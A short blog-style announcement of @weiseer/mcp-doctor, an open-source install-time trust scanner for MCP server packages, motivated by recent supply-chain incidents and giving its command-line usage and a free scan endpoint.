The MCP ecosystem has been growing fast, but the supply-chain hygiene has not kept up. MCPwn (CVE-2026-33032, CVSS 9.8) exposed 2,600+ instances. The Shai-Hulud npm worm stole MCP auth tokens from 172 packages. MCPSafe found high-severity bugs in official MCPs from Atlassian, GitHub, Cloudflare, and Microsoft. Perplexity open-sourced Bumblebee in May 2026 specifically because no good scanner existed. So I built one. Today I'm shipping @weiseer/mcp-doctor — an open-source install-time trust gate for MCP server packages — together with the validation dataset that surfaced its first real finding. TL;DR npx @weiseer/mcp-doctor @some/mcp-server Enter fullscreen mode Exit fullscreen mode Returns PASS / WARN / BLOCK with cited evidence per signal. The full scoring rubric is open-source so you can argue with the methodology rather than trust a black-box. Free public scan endpoint at https://api.weiseer.com/scan , 60 requests/min/IP, no auth.…